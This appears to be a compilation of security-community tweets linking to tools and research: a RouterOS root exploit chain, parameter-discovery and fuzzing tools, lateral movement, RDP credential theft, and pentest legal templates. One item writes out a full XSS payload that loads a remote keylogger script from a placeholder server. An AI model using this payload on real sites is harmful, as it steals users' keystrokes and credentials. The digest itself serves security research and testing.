RouterOS : Chain to Root - DNS Request to a Root Busybox Shell : https://t.co/eDqnIDHKdV

Bug Hunting in RouterOS : https://t.co/FqxamHNdUs (Slides)

PoC : https://t.co/IsCXSysp8j

Arjun : HTTP parameter discovery suite (Typical scan takes 30 sec with huge list of 25,980 param' names) : https://t.co/L14G2peGuW

WEIZZ: Automatic Grey-box Fuzzing for Structured Binary Formats

Target has an android app?

1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs

Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://t.co/PwIvyt9Uss

keylogger.js: https://t.co/g5HoTeA5z2

Interesting way to move laterally using the service manager without registering a service or writing a file to disk.

C# and Powershell version will be release soon.

https://t.co/ZGA78JFJxQ

Thanks to ChangeServiceConfigA

Happy to see more usages of Credential Guard protection in Windows 10 (enterprise/business), with persistance across reboots. #mimikatz

* BCryptIsoKeyData for CNG private keys ;
* Credential for domain_password credentials ;
* LsaIsoAsymmetricKeyBlob for MachineBoundCertificate.

#checkra1n beta 0.9.3 is out with significant improvements - get it at https://t.co/MqMSSonazH

Frizzer - Frida-based general purpose fuzzer

https://t.co/k2t960SPKJ

Use it to search for TLS certificates in the IPv4 space 🔍
https://t.co/YVeyCcM1El

Burpsuite pack a full list of wordlists:-

https://t.co/Imtqt4m6SB

Reminder for those asking me how to get started, this is one of the repos you will find a lot of info you need. It's overwhelming. Make a list of skills you want to learn and focus on one each. https://t.co/Dnhng9e4Kk

list of ctf sites on my site here:

https://t.co/9YboEtLmz2

POC, RemoteViewing, to demo RDP credential theft (adapted from @0x09AL post => https://t.co/sUhkZ7asOR) using EasyHook and Donut ☠️🖥️. More details on GitHub => https://t.co/bRXrFOR7Zu

Extracting cipher key from WhatsApp on Android >= 7 without root

https://t.co/TGiyX8lpyt

Sn1per v7.4 Released! New exploits (shoutout @D0rkerDevil), virtual host scanning, several new OSINT checks, various fixes + more! https://t.co/Z4NUaXRieP

Open sourced legal documentation used for physical penetration tests.

The purpose is to help the community and organizations protect their employees when conducting testing.

Includes three docs:

MSA
SOW
Authorization Letter

https://t.co/Tco6WuuuaU

Helpful info on making Firefox stop polluting your Burp session with superfluous requests:
https://t.co/93MP5jRH2s